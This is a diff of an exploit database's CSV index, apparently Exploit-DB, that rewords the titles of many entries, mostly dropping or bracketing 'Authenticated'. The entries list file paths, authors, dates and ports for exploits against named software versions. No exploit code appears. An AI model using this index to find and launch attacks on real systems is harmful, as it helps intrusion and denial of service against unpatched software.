4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,dos,windows, 19391,exploits/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows, 19392,exploits/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows, @@ -2431,7 +2431,7 @@ id,file,description,date,author,type,platform,port 20099,exploits/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - Denial of Service",2000-07-25,wildcoyote,dos,windows, 20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",dos,windows, 20101,exploits/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",dos,windows, -20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - Unauthenticated MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows, +20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows, 43147,exploits/hardware/dos/43147.sh,"D-Link DIR-605L < 2.08 - Denial of Service",2017-11-14,"Enrique Castillo",dos,hardware, 20167,exploits/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,dos,linux, 20175,exploits/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",dos,windows, @@ -3104,7 +3104,7 @@ id,file,description,date,author,type,platform,port 23715,exploits/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,dos,windows, 23716,exploits/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",dos,windows, 23731,exploits/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",dos,windows, -23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Unauthenticated Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",dos,php, +23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",dos,php, 23752,exploits/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,windows, 23755,exploits/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,multiple, 23757,exploits/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,linux, @@ -3568,7 +3568,7 @@ id,file,description,date,author,type,platform,port 27901,exploits/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",dos,multiple, 27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux, 27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows, -27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Unauthenticated Remote Buffer Overflow",2006-05-29,kcope,dos,windows, +27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows, 27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple, 27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux, 27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows, @@ -4923,7 +4923,7 @@ id,file,description,date,author,type,platform,port 39067,exploits/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,dos,windows, 39070,exploits/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,dos,windows, 39072,exploits/windows_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",dos,windows_x86-64, -39073,exploits/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",dos,cgi, +39073,exploits/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",dos,cgi, 39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read",2015-12-22,"Google Security Research",dos,multiple, 39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",dos,multiple, 39082,exploits/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",dos,multiple, @@ -5573,7 +5573,7 @@ id,file,description,date,author,type,platform,port 41869,exploits/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",dos,multiple, 41879,exploits/windows/dos/41879.txt,"Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call",2017-04-13,"Google Security Research",dos,windows, 41880,exploits/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",dos,windows, -41891,exploits/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution Scanner (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",dos,windows,445 +41891,exploits/windows/dos/41891.rb,"Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",dos,windows,445 41893,exploits/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow (PoC)",2017-04-18,"Nassim Asrir",dos,linux, 41898,exploits/linux/dos/41898.txt,"Dmitry 1.3a - Local Buffer Overflow (PoC)",2017-04-19,FarazPajohan,dos,linux, 41905,exploits/multiple/dos/41905.txt,"Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",dos,multiple, @@ -5593,7 +5593,7 @@ id,file,description,date,author,type,platform,port 41983,exploits/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow",2017-05-09,"Google Security Research",dos,android, 41984,exploits/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,dos,multiple, 41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap Buffer Overflow",2017-05-10,"Core Security",dos,linux, -41993,exploits/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,dos,multiple,1194 +41993,exploits/multiple/dos/41993.py,"OpenVPN 2.4.0 - Denial of Service",2017-05-11,QuarksLab,dos,multiple,1194 42001,exploits/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, 42002,exploits/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, 42006,exploits/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",dos,windows, @@ -6893,7 +6893,7 @@ id,file,description,date,author,type,platform,port 9661,exploits/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,local,windows, 9680,exploits/windows/local/9680.txt,"Protector Plus AntiVirus 8/9 - Local Privilege Escalation",2009-09-15,"Maxim A. Kulakov",local,windows, 9687,exploits/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,local,windows, -9688,exploits/hardware/local/9688.txt,"NetAccess IP3 - Authenticated Ping Option Command Injection",2009-09-15,r00t,local,hardware, +9688,exploits/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) Ping Option Command Injection",2009-09-15,r00t,local,hardware, 9709,exploits/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation",2009-09-17,Rick,local,linux, 9807,exploits/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,local,windows, 9831,exploits/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,local,windows, @@ -8298,7 +8298,7 @@ id,file,description,date,author,type,platform,port 21773,exploits/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,local,unix, 21774,exploits/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,local,unix, 21781,exploits/windows/local/21781.c,"Trillian Instant Messaging 0.x - Credential Encryption",2002-09-09,"Coeus Group",local,windows, -21790,exploits/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ Authenticate Privilege Escalation",2002-06-28,"Charles Stevenson",local,unix, +21790,exploits/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ (Authenticated) Privilege Escalation",2002-06-28,"Charles Stevenson",local,unix, 21793,exploits/linux/local/21793.txt,"BRU 17.0 - XBRU Insecure Temporary File",2002-09-13,prophecy,local,linux, 21796,exploits/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,local,unix, 21797,exploits/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,local,unix, @@ -10110,10 +10110,10 @@ id,file,description,date,author,type,platform,port 975,exploits/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow",2005-05-01,muts,remote,windows,21 976,exploits/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,remote,windows, 977,exploits/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force",2005-05-03,phased,remote,hp-ux, -979,exploits/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,remote,windows, +979,exploits/windows/remote/979.txt,"Hosting Controller 0.6.1 - User Registration (1)",2005-05-04,Mouse,remote,windows, 981,exploits/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String",2005-05-05,cybertronic,remote,linux,25 986,exploits/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",remote,windows, -987,exploits/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,remote,windows, +987,exploits/windows/remote/987.c,"Hosting Controller 0.6.1 - User Registration (2)",2005-05-07,Silentium,remote,windows, 990,exploits/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,remote,windows,20031 1007,exploits/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,remote,multiple, 1021,exploits/linux/remote/1021.c,"Ethereal 0.10.10 - 'SIP' Protocol Dissector Remote Buffer Overflow",2005-05-31,"Team W00dp3ck3r",remote,linux, @@ -10172,7 +10172,7 @@ id,file,description,date,author,type,platform,port 1243,exploits/windows/remote/1243.c,"CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow",2005-10-10,egm,remote,windows,5250 1247,exploits/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,remote,linux, 1258,exploits/linux/remote/1258.php,"e107 < 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,remote,linux, -1259,exploits/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing (Metasploit)",2005-10-19,Optyx,remote,hp-ux, +1259,exploits/hp-ux/remote/1259.pm,"HP-UX FTP Server - Directory Listing (Metasploit)",2005-10-19,Optyx,remote,hp-ux, 1260,exploits/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",remote,windows,80 1261,exploits/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",remote,hp-ux,515 1262,exploits/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM 'log_security()' Remote Stack Overflow (Metasploit)",2005-10-19,"H D Moore",remote,windows,4105 @@ -10439,12 +10439,12 @@ id,file,description,date,author,type,platform,port 3609,exploits/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",remote,linux, 3610,exploits/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",remote,windows, 3615,exploits/linux_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Remote Buffer Overflow",2007-03-30,mu-b,remote,linux_x86,53 -3616,exploits/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow",2007-03-31,muts,remote,windows,143 +3616,exploits/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Remote Overflow",2007-03-31,muts,remote,windows,143 3627,exploits/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,remote,windows,143 3634,exploits/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,remote,windows, 3635,exploits/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",remote,windows, 3636,exploits/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)",2007-04-01,jamikazu,remote,windows, -3650,exploits/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,remote,windows, +3650,exploits/windows/remote/3650.c,"Frontbase 4.2.7 - (Authenticated) Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,remote,windows, 3651,exploits/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Generator",2007-04-03,"YAG KOHHA",remote,windows, 3654,exploits/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution",2007-04-03,"Isma Khan",remote,multiple, 3661,exploits/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,remote,windows, @@ -10502,7 +10502,7 @@ id,file,description,date,author,type,platform,port 4016,exploits/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,remote,windows, 4021,exploits/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,remote,windows, 4023,exploits/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,remote,windows, -4027,exploits/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter)",2007-06-03,muts,remote,windows,8080 +4027,exploits/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Remote Overflow (Egghunter)",2007-06-03,muts,remote,windows,8080 4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64, 4042,exploits/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,remote,windows, 4043,exploits/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)",2007-06-07,Excepti0n,remote,windows, @@ -10564,10 +10564,10 @@ id,file,description,date,author,type,platform,port 4290,exploits/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,remote,windows, 4292,exploits/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,remote,windows, 4299,exploits/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,remote,windows, -4301,exploits/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,remote,windows,25 +4301,exploits/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow",2007-08-22,ZhenHan.Liu,remote,windows,25 4312,exploits/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,remote,linux,21 -4315,exploits/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",remote,linux,389 -4316,exploits/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,remote,windows,25 +4315,exploits/linux/remote/4315.py,"SIDVault LDAP Server - Remote Buffer Overflow",2007-08-25,"Joxean Koret",remote,linux,389 +4316,exploits/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite",2007-08-26,Heretic2,remote,windows,25 4321,exploits/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,remote,linux, 4322,exploits/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution",2007-08-28,shinnai,remote,windows, 4323,exploits/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method",2007-08-27,shinnai,remote,windows, @@ -10593,7 +10593,7 @@ id,file,description,date,author,type,platform,port 4424,exploits/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote",2007-09-18,"Aviv Raff",remote,windows, 4427,exploits/windows/remote/4427.html,"jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution",2007-09-19,h07,remote,windows, 4428,exploits/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,remote,windows, -4429,exploits/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow",2007-09-19,void,remote,windows,143 +4429,exploits/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' (Authenticated) Overflow",2007-09-19,void,remote,windows,143 4437,exploits/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution",2007-09-20,Andi,remote,linux,80 4438,exploits/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,remote,windows,25 4445,exploits/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Remote Buffer Overflow",2007-09-23,rgod,remote,windows, @@ -10657,7 +10657,7 @@ id,file,description,date,author,type,platform,port 4869,exploits/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,remote,windows, 4873,exploits/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,remote,windows, 4874,exploits/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,remote,windows, -4877,exploits/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",remote,multiple,7210 +4877,exploits/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Remote Command Execution",2008-01-09,"Luigi Auriemma",remote,multiple,7210 4894,exploits/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Remote Buffer Overflow",2008-01-11,Elazar,remote,windows, 4903,exploits/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module 'PdvrAtl.DLL 1.0.1.25' - Remote Buffer Overflow",2008-01-13,rgod,remote,windows, 4906,exploits/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow",2008-01-14,"Luigi Auriemma",remote,windows, @@ -10713,9 +10713,9 @@ id,file,description,date,author,type,platform,port 5230,exploits/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",remote,windows, 5238,exploits/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",remote,windows, 5248,exploits/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,remote,windows,143 -5249,exploits/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,remote,windows, +5249,exploits/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' (Authenticated) Remote Buffer Overflow",2008-03-14,haluznik,remote,windows, 5257,exploits/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,remote,multiple, -5259,exploits/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal",2008-03-14,ryujin,remote,windows,143 +5259,exploits/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP (Authenticated) Remote LIST Universal",2008-03-14,ryujin,remote,windows,143 5264,exploits/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,remote,windows, 5269,exploits/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",remote,windows, 5282,exploits/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,remote,solaris, @@ -10727,7 +10727,7 @@ id,file,description,date,author,type,platform,port 5330,exploits/windows_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,remote,windows_x86,80 5332,exploits/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,remote,windows, 5338,exploits/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,remote,windows, -5342,exploits/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Unauthenticated Overflow (SEH)",2008-04-02,muts,remote,windows,7510 +5342,exploits/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)",2008-04-02,muts,remote,windows,7510 5366,exploits/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,remote,solaris, 5386,exploits/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",remote,linux,80 5395,exploits/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,remote,windows, @@ -10736,7 +10736,7 @@ id,file,description,date,author,type,platform,port 5416,exploits/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method",2008-04-09,shinnai,remote,windows, 5430,exploits/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",remote,multiple, 5445,exploits/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow",2008-04-14,Heretic2,remote,windows,2954 -5451,exploits/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote Overflow (SEH)",2008-04-15,ryujin,remote,windows,6080 +5451,exploits/windows/remote/5451.py,"BigAnt Server 2.2 - Remote Overflow (SEH)",2008-04-15,ryujin,remote,windows,6080 5461,exploits/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow (Metasploit)",2008-04-17,oveRet,remote,windows, 5489,exploits/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",remote,windows, 5496,exploits/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,remote,windows, @@ -10760,7 +10760,7 @@ id,file,description,date,author,type,platform,port 5746,exploits/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,remote,windows, 5747,exploits/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,remote,windows, 5750,exploits/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,remote,windows, -5751,exploits/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote Overflow (SEH)",2008-06-06,ryujin,remote,windows,22 +5751,exploits/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote Overflow (SEH)",2008-06-06,ryujin,remote,windows,22 5777,exploits/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,remote,windows, 5778,exploits/windows/remote/5778.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow (2)",2008-06-10,shinnai,remote,windows, 5790,exploits/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",remote,multiple,161 @@ -10773,7 +10773,7 @@ id,file,description,date,author,type,platform,port 6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,remote,osx, 6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,remote,linux,80 6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,remote,windows,80 -6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux, +6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux, 6100,exploits/windows_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,remote,windows_x86,80 6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",remote,windows, 6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,remote,windows, @@ -10823,7 +10823,7 @@ id,file,description,date,author,type,platform,port 6630,exploits/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Code Execution",2008-09-30,Nine:Situations:Group,remote,windows, 6638,exploits/windows/remote/6638.html,"GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec",2008-09-30,EgiX,remote,windows, 6656,exploits/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)",2008-10-02,Ac!dDrop,remote,windows, -6661,exploits/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,remote,windows, +6661,exploits/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,remote,windows, 6666,exploits/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,remote,windows, 6686,exploits/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",remote,windows, 6690,exploits/windows/remote/6690.html,"Skype Extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,remote,windows, @@ -10904,7 +10904,7 @@ id,file,description,date,author,type,platform,port 7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request 